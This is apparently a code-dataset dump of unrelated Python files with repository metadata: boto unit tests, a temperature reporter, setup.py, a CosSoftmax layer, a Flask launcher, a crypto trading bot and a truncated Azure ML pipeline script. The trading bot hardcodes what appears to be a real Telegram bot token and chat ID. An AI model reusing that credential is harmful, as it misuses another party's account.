locale.setlocale(locale.LC_ALL, self._saved)
def test_nonus_locale(self):
test_string = 'Thu, 15 May 2014 09:06:03 GMT'
# Default strptime shoudl fail
with self.assertRaises(ValueError):
datetime.datetime.strptime(test_string, boto.utils.RFC1123)
# Our parser should succeed
result = boto.utils.parse_ts(test_string)
self.assertEqual(2014, result.year)
self.assertEqual(5, result.month)
self.assertEqual(15, result.day)
self.assertEqual(9, result.hour)
self.assertEqual(6, result.minute)
if __name__ == '__main__':
unittest.main()
| 33.307167 | 81 | 0.650579 |
try:
import unittest2 as unittest
except ImportError:
import unittest
import datetime
import hashlib
import hmac
import locale
import mock
import thread
import time
import boto.utils
from boto.utils import Password
from boto.utils import pythonize_name
from boto.utils import _build_instance_metadata_url
from boto.utils import get_instance_userdata
from boto.utils import retry_url
from boto.utils import LazyLoadMetadata
from boto.compat import json
@unittest.skip("http://bugs.python.org/issue7980")
class TestThreadImport(unittest.TestCase):
def test_strptime(self):
def f():
for m in xrange(1, 13):
for d in xrange(1,29):
boto.utils.parse_ts('2013-01-01T00:00:00Z')
for _ in xrange(10):
thread.start_new_thread(f, ())
time.sleep(3)
class TestPassword(unittest.TestCase):
def clstest(self, cls):
password = cls('foo')
self.assertNotEquals(password, 'foo')
password.set('foo')
hashed = str(password)
self.assertEquals(password, 'foo')
self.assertEquals(password.str, hashed)
password = cls(hashed)
self.assertNotEquals(password.str, 'foo')
self.assertEquals(password, 'foo')
self.assertEquals(password.str, hashed)
def test_aaa_version_1_9_default_behavior(self):
self.clstest(Password)
def test_custom_hashclass(self):
class SHA224Password(Password):
hashfunc = hashlib.sha224
password = SHA224Password()
password.set('foo')
self.assertEquals(hashlib.sha224('foo').hexdigest(), str(password))
def test_hmac(self):
def hmac_hashfunc(cls, msg):
return hmac.new('mysecretkey', msg)
class HMACPassword(Password):
hashfunc = hmac_hashfunc
self.clstest(HMACPassword)
password = HMACPassword()
password.set('foo')
self.assertEquals(str(password),
hmac.new('mysecretkey', 'foo').hexdigest())
def test_constructor(self):
hmac_hashfunc = lambda msg: hmac.new('mysecretkey', msg)
password = Password(hashfunc=hmac_hashfunc)
password.set('foo')
self.assertEquals(password.str,
hmac.new('mysecretkey', 'foo').hexdigest())
class TestPythonizeName(unittest.TestCase):
def test_empty_string(self):
self.assertEqual(pythonize_name(''), '')
def test_all_lower_case(self):
self.assertEqual(pythonize_name('lowercase'), 'lowercase')
def test_all_upper_case(self):
self.assertEqual(pythonize_name('UPPERCASE'), 'uppercase')
def test_camel_case(self):
self.assertEqual(pythonize_name('OriginallyCamelCased'),
'originally_camel_cased')
def test_already_pythonized(self):
self.assertEqual(pythonize_name('already_pythonized'),
'already_pythonized')
def test_multiple_upper_cased_letters(self):
self.assertEqual(pythonize_name('HTTPRequest'), 'http_request')
self.assertEqual(pythonize_name('RequestForHTTP'), 'request_for_http')
def test_string_with_numbers(self):
self.assertEqual(pythonize_name('HTTPStatus200Ok'), 'http_status_200_ok')
class TestBuildInstanceMetadataURL(unittest.TestCase):
def test_normal(self):
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'latest',
'meta-data/'
),
'http://169.254.169.254/latest/meta-data/'
)
def test_custom_path(self):
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'latest',
'dynamic/'
),
'http://169.254.169.254/latest/dynamic/'
)
def test_custom_version(self):
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'1.0',
'meta-data/'
),
'http://169.254.169.254/1.0/meta-data/'
)
def test_custom_url(self):
self.assertEqual(_build_instance_metadata_url(
'http://10.0.1.5',
'latest',
'meta-data/'
),
'http://10.0.1.5/latest/meta-data/'
)
def test_all_custom(self):
self.assertEqual(_build_instance_metadata_url(
'http://10.0.1.5',
'2013-03-22',
'user-data'
),
'http://10.0.1.5/2013-03-22/user-data'
)
class TestRetryURL(unittest.TestCase):
def setUp(self):
self.urlopen_patch = mock.patch('urllib2.urlopen')
self.opener_patch = mock.patch('urllib2.build_opener')
self.urlopen = self.urlopen_patch.start()
self.opener = self.opener_patch.start()
def tearDown(self):
self.urlopen_patch.stop()
self.opener_patch.stop()
def set_normal_response(self, response):
fake_response = mock.Mock()
fake_response.read.return_value = response
self.urlopen.return_value = fake_response
def set_no_proxy_allowed_response(self, response):
fake_response = mock.Mock()
fake_response.read.return_value = response
self.opener.return_value.open.return_value = fake_response
def test_retry_url_uses_proxy(self):
self.set_normal_response('normal response')
self.set_no_proxy_allowed_response('no proxy response')
response = retry_url('http://10.10.10.10/foo', num_retries=1)
self.assertEqual(response, 'no proxy response')
class TestLazyLoadMetadata(unittest.TestCase):
def setUp(self):
self.retry_url_patch = mock.patch('boto.utils.retry_url')
boto.utils.retry_url = self.retry_url_patch.start()
def tearDown(self):
self.retry_url_patch.stop()
def set_normal_response(self, data):
fake_response = mock.Mock()
fake_response.side_effect = data
boto.utils.retry_url = fake_response
def test_meta_data_with_invalid_json_format_happened_once(self):
key_data = "test"
invalid_data = '{"invalid_json_format" : true,}'
valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
url = "/".join(["http://169.254.169.254", key_data])
num_retries = 2
self.set_normal_response([key_data, invalid_data, valid_data])
response = LazyLoadMetadata(url, num_retries)
self.assertEqual(response.values()[0], json.loads(valid_data))
def test_meta_data_with_invalid_json_format_happened_twice(self):
key_data = "test"
invalid_data = '{"invalid_json_format" : true,}'
valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
url = "/".join(["http://169.254.169.254", key_data])
num_retries = 2
self.set_normal_response([key_data, invalid_data, invalid_data])
response = LazyLoadMetadata(url, num_retries)
with self.assertRaises(ValueError):
response.values()[0]
def test_user_data(self):
self.set_normal_response(['foo'])
userdata = get_instance_userdata()
self.assertEqual('foo', userdata)
boto.utils.retry_url.assert_called_with(
'http://169.254.169.254/latest/user-data',
retry_on_404=False)
class TestStringToDatetimeParsing(unittest.TestCase):
def setUp(self):
self._saved = locale.setlocale(locale.LC_ALL)
locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
def tearDown(self):
locale.setlocale(locale.LC_ALL, self._saved)
def test_nonus_locale(self):
test_string = 'Thu, 15 May 2014 09:06:03 GMT'
with self.assertRaises(ValueError):
datetime.datetime.strptime(test_string, boto.utils.RFC1123)
result = boto.utils.parse_ts(test_string)
self.assertEqual(2014, result.year)
self.assertEqual(5, result.month)
self.assertEqual(15, result.day)
self.assertEqual(9, result.hour)
self.assertEqual(6, result.minute)
if __name__ == '__main__':
unittest.main()
| true | true |
f7328f2ec786dc897da0bb3735ef8a755cd94bc3 | 772 | py | Python | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | 3 | 2021-08-01T00:31:50.000Z | 2021-12-15T23:42:52.000Z | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | null | null | null | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | 3 | 2021-12-07T13:18:44.000Z | 2022-01-28T00:41:46.000Z | from modules.lib.reporter import Reporter
from modules.lib.report import Report
from modules.lib.alarm_machine import AlarmMachine
class TemperatureReporter(Reporter):
def data_type(self):
return 'temperature'
def report(self):
with open('/sys/class/thermal/thermal_zone0/temp') as file:
temp = int(file.read()) / float(1000)
report = Report.report_now(
'measurement',
type='temperature',
key='zone_0',
value=temp,
unit='c'
)
alarm = None
if self.alarm_machine() is not None:
alarm = self.alarm_machine().judge('temperature', temp,
report.reported_at)
return report, alarm
| 29.692308 | 67 | 0.576425 | from modules.lib.reporter import Reporter
from modules.lib.report import Report
from modules.lib.alarm_machine import AlarmMachine
class TemperatureReporter(Reporter):
def data_type(self):
return 'temperature'
def report(self):
with open('/sys/class/thermal/thermal_zone0/temp') as file:
temp = int(file.read()) / float(1000)
report = Report.report_now(
'measurement',
type='temperature',
key='zone_0',
value=temp,
unit='c'
)
alarm = None
if self.alarm_machine() is not None:
alarm = self.alarm_machine().judge('temperature', temp,
report.reported_at)
return report, alarm
| true | true |
f73290c0fd0677b07fe0cd79a344a6e52fbf148d | 733 | py | Python | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | null | null | null | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | 1 | 2021-04-07T13:16:00.000Z | 2021-04-07T13:16:00.000Z | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='the-littlest-jupyterhub',
version='0.1',
description='A small JupyterHub distribution',
url='https://github.com/jupyterhub/the-littlest-jupyterhub',
author='Jupyter Development Team',
author_email='jupyter@googlegroups.com',
license='3 Clause BSD',
packages=find_packages(),
include_package_data=True,
install_requires=[
'ruamel.yaml==0.15.*',
'jinja2',
'pluggy>0.7<1.0',
'passlib',
'backoff',
'requests',
'bcrypt',
'jupyterhub-traefik-proxy==0.2.*',
],
entry_points={
'console_scripts': [
'tljh-config = tljh.config:main',
]
},
)
| 25.275862 | 64 | 0.594816 | from setuptools import setup, find_packages
setup(
name='the-littlest-jupyterhub',
version='0.1',
description='A small JupyterHub distribution',
url='https://github.com/jupyterhub/the-littlest-jupyterhub',
author='Jupyter Development Team',
author_email='jupyter@googlegroups.com',
license='3 Clause BSD',
packages=find_packages(),
include_package_data=True,
install_requires=[
'ruamel.yaml==0.15.*',
'jinja2',
'pluggy>0.7<1.0',
'passlib',
'backoff',
'requests',
'bcrypt',
'jupyterhub-traefik-proxy==0.2.*',
],
entry_points={
'console_scripts': [
'tljh-config = tljh.config:main',
]
},
)
| true | true |
f73290d84c37138805df43d4dc3c217150c2e691 | 11,133 | py | Python | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | r"""
Ce programme sert à ouvrir, gérer et fermer les positions.
Enregistre les positions dans la base de données et dans un fichier excel,
les affiches dans le terminal puis envoie une notification au groupe telegram
"""
import time,datetime,os,sys,requests
from brokerconnection import realcommands
from prediction import Prediction
from settings import Settings
from database import Database
from position import Position
from csv_generator import csv_generator
#Definition of variables
Position=Position()
Settings=Settings()
Database=Database()
def current_second() :
return datetime.datetime.now().second
def cls():
"""
This function clear the terminal in order to get the clear view of the prints.c
"""
os.system('cls' if os.name=='nt' else 'clear')
def open_position(symbol):
"""
This function send an open order to the broker, with the opening price,
and then save the data inside the class Position.
"""
if Position.backtesting == False:
order = realcommands().limit_open(symbol=symbol,backtesting=Position.backtesting)
if order['error']==True:
return False
Position.open_price=float(order['order']['price'])
current_price = Settings.broker.price(symbol)['ask']
else:
time.sleep(2)
current_price = Settings.broker.price(symbol)['ask']
Position.open_price = current_price
Position.symbol=symbol
Position.current_price =current_price
#Setting highest price and lowest price to the opening price
Position.highest_price=Position.open_price
Position.lowest_price=Position.open_price
Position.status='open'
Position.number+=1
Position.time=time.time()
return True
def close_position():
"""
This function send a close order to the broker, at market,
and then save the data inside an excel spreadsheet.
"""
Position.status='close'
Position.stoploss = False
Position.effective_yield = effective_yield_calculation(Position.close_price,Position.open_price,Settings.fee)
Position.total_yield = round(Position.total_yield*Position.effective_yield,5)
if Position.total_yield > Position.highest_yield:
Position.highest_yield = Position.total_yield
save_position()
return
def save_position():
"""
This function sends notification and add position information to database.
"""
try:
date = time.time()
text=''
text+="\nRendement : "+str(round((Position.total_yield-1)*100,2))+' %'
program_notification(message=text)
#Saving position into database
Database.database_request(
sql=("""REPLACE INTO positions (paire,opening_date,closing_date,duration,opening_price,closing_price,exit_way,highest_price,lowest_price,position_yield,total_yield) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""),
params=(
Position.symbol,
datetime.datetime.fromtimestamp(Position.time),
datetime.datetime.fromtimestamp(date),
str(datetime.timedelta(seconds=round(date,0)-round(Position.time,0))),
Position.open_price,
Position.close_price,
Position.close_mode,
Position.highest_price,
Position.lowest_price,
Position.effective_yield,
Position.total_yield,
),
commit=True
)
return
except Exception as error:
program_notification(message=error)
def program_notification(message):
try:
token = "1813447727:AAHDPI54DetjXDDNFCMqtN-7phGvwNy9rqY"
chat_id = "-431364858"
url = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={message}"
requests.post(url)
except Exception as error:
print(error)
def effective_yield_calculation(current_price,opening_price,fee):
R = float(current_price)/float(opening_price)
F = float(fee)
return (R-(F+(1-F)*R*F))
def check_position():
"""
Function to update the current_price, the highest_price and the lowest price
Then checks if it has to close the position
"""
Position.current_price = Settings.broker.price(Position.symbol)['bid']
#Updating highest_price
if Position.current_price >Position.highest_price:
Position.highest_price=Position.current_price
#Updating lowest_price
if Position.current_price <Position.lowest_price:
Position.lowest_price=Position.current_price
#Calculating current effective_yield
current_effective_yield = effective_yield_calculation(
current_price=Position.current_price,
opening_price=Position.open_price,
fee=Settings.fee
)
#Stop loss
#Close position :
if current_effective_yield < Settings.risk:
if Position.backtesting:
Position.close_price = Position.open_price*(Settings.risk)
else:
order = realcommands().limit_close(Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stoploss'
Position.number_lost+=1
close_position()
return
#Take profit on expected yield
#Closing on takeprofit : Check if the yield is stronger than the minimal yield considering fees and slippage
if current_effective_yield > Settings.expected_yield:
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'takeprofit'
close_position()
return
def find_entry_point():
#Analyse market every second
#We use the watchlist defined in settings.py
for symbol in Settings.watchlist:
time.sleep(1)
try:
#We analyze the market with the signals defined inside prediction.py
predict = Prediction().buy_signal(symbol+'/'+Settings.base_asset)
#We clear the console
cls()
for values in predict:
print(values,':',predict[values],'\n')
#Give information about the program
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'total_yield':str(round((Position.total_yield-1)*100,2))+' %',
'position_number':Position.number,
'position_lost':Position.number_lost,
}
for data, value in statistics.items():
print(data, ':', value, '\n')
#If we get a buy signal then :
if predict['signal'] == 'buy' and open_position(
symbol+'/'+Settings.base_asset
):
Settings.expected_yield = predict['recovery']
return predict
except Exception as error:
print('error while predicting : %s' % error)
def manage_position(predict):
#We clear the console
cls()
for values in predict:
print(values,':',predict[values],'\n')
current_effective_yield=effective_yield_calculation(Position.current_price,Position.open_price,Settings.fee)
#Give information about the program
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'current_price':Position.current_price,
'open_price':Position.open_price,
'highest_price':Position.highest_price,
'lowest_price':Position.lowest_price,
'position_number':Position.number,
'position_yield':str(round((current_effective_yield-1)*100,2))+' %',
'total_yield':str(round((Position.total_yield*current_effective_yield-1)*100,2))+' %',
'number_lost':Position.number_lost,
'stoploss':Position.stoploss,
'current_position_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.time,0))),
}
for data, value__ in statistics.items():
print(data, ':', value__, '\n')
try:
#We check if we have to do something with the current position, update current price highest price and lowest price
check_position()
except Exception as e:
print(e)
#We slow down the requests
time.sleep(0.2)
def main():
'''Brain'''
#Check the correct version of python
if sys.version_info[0] < 3:
raise Exception("Python 3 or a more recent version is required.")
#test des commandes et de la connection au broker
if realcommands().test_connection():
print("Connected to market")
elif input("Unable to connect to market, run in backtesting mode? Y/N : ").upper()=='N':
return
else:
Position.backtesting = True
#Generates file with known supports
csv_generator()
#On change la description du telegram pour les settings
parameters = vars(Settings)
about = ''.join(
'\n' + str(param) + ' : ' + str(value_)
for param, value_ in parameters.items()
)
program_notification(about)
#On initialise le temps de fonctionnement du programme
Position.start_time = time.time()
print('---Starting Trading---')
if Position.backtesting == True:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode démo \n"+Settings.commentaire)
else:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode réél \n"+Settings.commentaire)
while True:
try:
if Position.highest_yield-Position.total_yield > Settings.program_risk:
print("Program stopped : check strategy")
break
if Position.status == 'close':
predict = find_entry_point()
elif Position.status == 'open':
manage_position(predict)
except KeyboardInterrupt:
cls()
if Position.status == 'open':
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stopping program'
close_position()
print("---Ending Trading--")
break
program_notification("Arrêt du programme : "+Settings.program_name)
if __name__=='__main__':
main()
| 34.790625 | 223 | 0.633971 | import time,datetime,os,sys,requests
from brokerconnection import realcommands
from prediction import Prediction
from settings import Settings
from database import Database
from position import Position
from csv_generator import csv_generator
Position=Position()
Settings=Settings()
Database=Database()
def current_second() :
return datetime.datetime.now().second
def cls():
os.system('cls' if os.name=='nt' else 'clear')
def open_position(symbol):
if Position.backtesting == False:
order = realcommands().limit_open(symbol=symbol,backtesting=Position.backtesting)
if order['error']==True:
return False
Position.open_price=float(order['order']['price'])
current_price = Settings.broker.price(symbol)['ask']
else:
time.sleep(2)
current_price = Settings.broker.price(symbol)['ask']
Position.open_price = current_price
Position.symbol=symbol
Position.current_price =current_price
Position.highest_price=Position.open_price
Position.lowest_price=Position.open_price
Position.status='open'
Position.number+=1
Position.time=time.time()
return True
def close_position():
Position.status='close'
Position.stoploss = False
Position.effective_yield = effective_yield_calculation(Position.close_price,Position.open_price,Settings.fee)
Position.total_yield = round(Position.total_yield*Position.effective_yield,5)
if Position.total_yield > Position.highest_yield:
Position.highest_yield = Position.total_yield
save_position()
return
def save_position():
try:
date = time.time()
text=''
text+="\nRendement : "+str(round((Position.total_yield-1)*100,2))+' %'
program_notification(message=text)
Database.database_request(
sql=("""REPLACE INTO positions (paire,opening_date,closing_date,duration,opening_price,closing_price,exit_way,highest_price,lowest_price,position_yield,total_yield) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""),
params=(
Position.symbol,
datetime.datetime.fromtimestamp(Position.time),
datetime.datetime.fromtimestamp(date),
str(datetime.timedelta(seconds=round(date,0)-round(Position.time,0))),
Position.open_price,
Position.close_price,
Position.close_mode,
Position.highest_price,
Position.lowest_price,
Position.effective_yield,
Position.total_yield,
),
commit=True
)
return
except Exception as error:
program_notification(message=error)
def program_notification(message):
try:
token = "1813447727:AAHDPI54DetjXDDNFCMqtN-7phGvwNy9rqY"
chat_id = "-431364858"
url = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={message}"
requests.post(url)
except Exception as error:
print(error)
def effective_yield_calculation(current_price,opening_price,fee):
R = float(current_price)/float(opening_price)
F = float(fee)
return (R-(F+(1-F)*R*F))
def check_position():
Position.current_price = Settings.broker.price(Position.symbol)['bid']
if Position.current_price >Position.highest_price:
Position.highest_price=Position.current_price
if Position.current_price <Position.lowest_price:
Position.lowest_price=Position.current_price
current_effective_yield = effective_yield_calculation(
current_price=Position.current_price,
opening_price=Position.open_price,
fee=Settings.fee
)
if current_effective_yield < Settings.risk:
if Position.backtesting:
Position.close_price = Position.open_price*(Settings.risk)
else:
order = realcommands().limit_close(Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stoploss'
Position.number_lost+=1
close_position()
return
if current_effective_yield > Settings.expected_yield:
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'takeprofit'
close_position()
return
def find_entry_point():
for symbol in Settings.watchlist:
time.sleep(1)
try:
predict = Prediction().buy_signal(symbol+'/'+Settings.base_asset)
cls()
for values in predict:
print(values,':',predict[values],'\n')
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'total_yield':str(round((Position.total_yield-1)*100,2))+' %',
'position_number':Position.number,
'position_lost':Position.number_lost,
}
for data, value in statistics.items():
print(data, ':', value, '\n')
if predict['signal'] == 'buy' and open_position(
symbol+'/'+Settings.base_asset
):
Settings.expected_yield = predict['recovery']
return predict
except Exception as error:
print('error while predicting : %s' % error)
def manage_position(predict):
cls()
for values in predict:
print(values,':',predict[values],'\n')
current_effective_yield=effective_yield_calculation(Position.current_price,Position.open_price,Settings.fee)
statistics = {
'':'------------------------------ :',
'running_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.start_time,0))),
'current_status':Position.status,
'current_price':Position.current_price,
'open_price':Position.open_price,
'highest_price':Position.highest_price,
'lowest_price':Position.lowest_price,
'position_number':Position.number,
'position_yield':str(round((current_effective_yield-1)*100,2))+' %',
'total_yield':str(round((Position.total_yield*current_effective_yield-1)*100,2))+' %',
'number_lost':Position.number_lost,
'stoploss':Position.stoploss,
'current_position_time':str(datetime.timedelta(seconds=round(time.time(),0)-round(Position.time,0))),
}
for data, value__ in statistics.items():
print(data, ':', value__, '\n')
try:
check_position()
except Exception as e:
print(e)
time.sleep(0.2)
def main():
if sys.version_info[0] < 3:
raise Exception("Python 3 or a more recent version is required.")
if realcommands().test_connection():
print("Connected to market")
elif input("Unable to connect to market, run in backtesting mode? Y/N : ").upper()=='N':
return
else:
Position.backtesting = True
csv_generator()
parameters = vars(Settings)
about = ''.join(
'\n' + str(param) + ' : ' + str(value_)
for param, value_ in parameters.items()
)
program_notification(about)
Position.start_time = time.time()
print('---Starting Trading---')
if Position.backtesting == True:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode démo \n"+Settings.commentaire)
else:
program_notification("Démarrage du programme : "+Settings.program_name + " en mode réél \n"+Settings.commentaire)
while True:
try:
if Position.highest_yield-Position.total_yield > Settings.program_risk:
print("Program stopped : check strategy")
break
if Position.status == 'close':
predict = find_entry_point()
elif Position.status == 'open':
manage_position(predict)
except KeyboardInterrupt:
cls()
if Position.status == 'open':
if Position.backtesting:
Position.close_price = Position.current_price
else:
order = realcommands().limit_close(symbol=Position.symbol,backtesting=Position.backtesting)
Position.close_price = float(order['price'])
Position.close_mode = 'stopping program'
close_position()
print("---Ending Trading--")
break
program_notification("Arrêt du programme : "+Settings.program_name)
if __name__=='__main__':
main()
| true | true |
f73291c826cb60dbd0831bf1e0263014829f7443 | 1,399 | py | Python | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 19 | 2021-09-10T02:16:29.000Z | 2022-03-27T12:47:46.000Z | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 5 | 2021-09-27T03:52:12.000Z | 2021-12-29T09:13:40.000Z | fastreid/layers/cos_softmax.py | tycallen/fast-reid | 66683fa95bc7d7222659e8db3ac04e5b8e366190 | [
"Apache-2.0"
] | 3 | 2021-12-23T16:44:44.000Z | 2022-03-27T12:47:47.000Z | # encoding: utf-8
"""
@author: xingyu liao
@contact: sherlockliao01@gmail.com
"""
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
r"""Implement of large margin cosine distance:
Args:
in_feat: size of each input sample
num_classes: size of each output sample
"""
def __init__(self, cfg, in_feat, num_classes):
super().__init__()
self.in_features = in_feat
self._num_classes = num_classes
self.s = cfg.MODEL.HEADS.SCALE
self.m = cfg.MODEL.HEADS.MARGIN
self.weight = Parameter(torch.Tensor(num_classes, in_feat))
nn.init.xavier_uniform_(self.weight)
def forward(self, features, targets):
# --------------------------- cos(theta) & phi(theta) ---------------------------
cosine = F.linear(F.normalize(features), F.normalize(self.weight))
phi = cosine - self.m
# --------------------------- convert label to one-hot ---------------------------
targets = F.one_hot(targets, num_classes=self._num_classes)
output = (targets * phi) + ((1.0 - targets) * cosine)
output *= self.s
return output
def extra_repr(self):
return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
self.in_feat, self._num_classes, self.s, self.m
)
| 31.795455 | 90 | 0.584703 |
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import Parameter
class CosSoftmax(nn.Module):
def __init__(self, cfg, in_feat, num_classes):
super().__init__()
self.in_features = in_feat
self._num_classes = num_classes
self.s = cfg.MODEL.HEADS.SCALE
self.m = cfg.MODEL.HEADS.MARGIN
self.weight = Parameter(torch.Tensor(num_classes, in_feat))
nn.init.xavier_uniform_(self.weight)
def forward(self, features, targets):
cosine = F.linear(F.normalize(features), F.normalize(self.weight))
phi = cosine - self.m
targets = F.one_hot(targets, num_classes=self._num_classes)
output = (targets * phi) + ((1.0 - targets) * cosine)
output *= self.s
return output
def extra_repr(self):
return 'in_features={}, num_classes={}, scale={}, margin={}'.format(
self.in_feat, self._num_classes, self.s, self.m
)
| true | true |
f732945508b4f5b0ce0dabe10f16e4ac669fd278 | 92 | py | Python | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | myapp/app.py | cwg83/cgoodale.com-flask | 50a18585e8d0e2ae31bfb12ed552e1c5089094c2 | [
"CC0-1.0"
] | null | null | null | from calblog import app
if __name__ == '__main__':
app.run(port=34630, debug=True)
| 10.222222 | 35 | 0.673913 | from calblog import app
if __name__ == '__main__':
app.run(port=34630, debug=True)
| true | true |
f73294872a3d8143e1add44fe880ba57f1fac308 | 2,252 | py | Python | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | mlapp/integrations/aml/scripts/publish_multisteps_pipeline.py | nbk905/mlapp | af650a8a302959674dd5a1bc6d15e30e90abf227 | [
"Apache-2.0"
] | null | null | null | from azureml.data.data_reference import DataReference
from azureml.pipeline.core import PipelineData
from mlapp.integrations.aml.utils.compute import get_or_create_compute_target
from mlapp.integrations.aml.utils.constants import OUTPUT_PATH_ON_COMPUTE, DATA_REFERENCE_NAME
from mlapp.integrations.aml.utils.pipeline import publish_pipeline_endpoint, create_mlapp_pipeline_step
from mlapp.integrations.aml.utils.runconfig import create_runconfig
import os
def run_script(ws, env, datastore, pipeline_name, instructions):
pipeline_steps = []
last_output = []
for i in range(len(instructions)):
compute_target = get_or_create_compute_target(
ws,
compute_name=instructions[i]['name'],
vm_size=instructions[i].get('vm_size', 'STANDARD_D2_V2'),
min_nodes=instructions[i].get('min_nodes', 0),
max_nodes=instructions[i].get('max_nodes', 4),
idle_sec=instructions[i].get('idle_seconds_before_scale_down', 120)
)
run_config = create_runconfig(compute_target, env)
# input directory in datastore
if len(last_output) == 0:
input_dir = None
# input_dir = DataReference(
# datastore=datastore,
# data_reference_name=DATA_REFERENCE_NAME + str(i),
# path_on_datastore="flows/",
# mode='download'
# )
else:
input_dir = last_output
# output directory in datastore
output_dir = PipelineData(
name=DATA_REFERENCE_NAME + str(i),
datastore=datastore,
output_path_on_compute=OUTPUT_PATH_ON_COMPUTE
)
# create pipeline step
pipeline_step = create_mlapp_pipeline_step(
compute_target, run_config,
source_directory=os.getcwd(),
entry_script=os.path.join("deployment", "aml_flow.py"),
input_dir=input_dir,
output_dir=output_dir,
param_name='config' + str(i)
)
# add to pipeline
pipeline_steps += pipeline_step
# reference last output
last_output.append(output_dir)
publish_pipeline_endpoint(ws, pipeline_steps, pipeline_name)
| 35.1875 | 103 | 0.654085 | from azureml.data.data_reference import DataReference
from azureml.pipeline.core import PipelineData
from mlapp.integrations.aml.utils.compute import get_or_create_compute_target
from mlapp.integrations.aml.utils.constants import OUTPUT_PATH_ON_COMPUTE, DATA_REFERENCE_NAME
from mlapp.integrations.aml.utils.pipeline import publish_pipeline_endpoint, create_mlapp_pipeline_step
from mlapp.integrations.aml.utils.runconfig import create_runconfig
import os
def run_script(ws, env, datastore, pipeline_name, instructions):
pipeline_steps = []
last_output = []
for i in range(len(instructions)):
compute_target = get_or_create_compute_target(
ws,
compute_name=instructions[i]['name'],
vm_size=instructions[i].get('vm_size', 'STANDARD_D2_V2'),
min_nodes=instructions[i].get('min_nodes', 0),
max_nodes=instructions[i].get('max_nodes', 4),
idle_sec=instructions[i].get('idle_seconds_before_scale_down', 120)
)
run_config = create_runconfig(compute_target, env)
if len(last_output) == 0:
input_dir = None
else:
input_dir = last_output
output_dir = PipelineData(
name=DATA_REFERENCE_NAME + str(i),
datastore=datastore,
output_path_on_compute=OUTPUT_PATH_ON_COMPUTE
)
pipeline_step = create_mlapp_pipeline_step(
compute_target, run_config,
source_directory=os.getcwd(),
entry_script=os.path.join("deployment", "aml_flow.py"),
input_dir=input_dir,
output_dir=output_dir,
param_name='config' + str(i)
)
